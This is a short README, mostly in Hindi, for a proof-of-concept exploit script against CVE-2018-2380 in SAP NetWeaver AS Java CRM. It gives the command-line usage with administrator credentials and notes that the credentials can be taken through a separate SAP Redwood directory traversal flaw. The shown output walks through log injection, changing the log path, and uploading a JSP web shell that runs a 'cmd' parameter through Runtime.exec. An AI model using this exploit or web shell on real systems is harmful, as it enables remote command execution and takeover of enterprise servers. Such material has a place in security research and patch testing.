
SAP NetWeaver AS JAVA CRM पर लॉग इंजेक्शन के माध्यम से दूरस्थ कमांड निष्पादन का PoC
SAP NetWeaver AS JAVA CRM पर लॉग इंजेक्शन के माध्यम से रिमोट कमांड निष्पादन का PoC स्क्रिप्ट उपयोग उदाहरण
python crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true
जहाँ --host SAP सर्वर IP है --port SAP NetWeaver AS Java पोर्ट है username और password SAP प्रशासक के हैं, जिन्हें आप SAP Redwood डायरेक्टरी ट्रैवर्सल भेद्यता का उपयोग करके प्राप्त कर सकते हैं।
उदाहरण स्क्रिप्ट उपयोग आउटपुट
C:\exploits\SAP>crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true
_______ _______ _______ _______ _______ _______ _
( ____ \( ____ )( ____ )( ____ \( ____ \( ___ )( ( /|
| ( \/| ( )|| ( )|| ( \/| ( \/| ( ) || \ ( |
| (__ | (____)|| (____)|| (_____ | | | (___) || \ | |
| __) | __)| _____)(_____ )| | | ___ || (\ \) |
| ( | (\ ( | ( ) || | | ( ) || | \ |
| (____/\| ) \ \__| ) /\____) || (____/\| ) ( || ) \ |
(_______/|/ \__/|/ \_______)(_______/|/ \||/ )_)
Vahagn @vah_13 Vardanian
Bob @NewFranny
Mathieu @gelim
CVE-2018-2380
[!] Try to get RCE using log injection
[!] Get j_salt token for requests
[!] Login to the SAP portal
[!] Change log path
[!] Upload "Runtime.getRuntime().exec(request.getParameter("cmd")) " shell to https://127.0.0.1:50001/ERPScan_shell_31275.0.jsp?cmd=ipconfig
[!] Restore logs path to ./default_log_name.log
[!] Enjoy!
C:\exploits\SAP>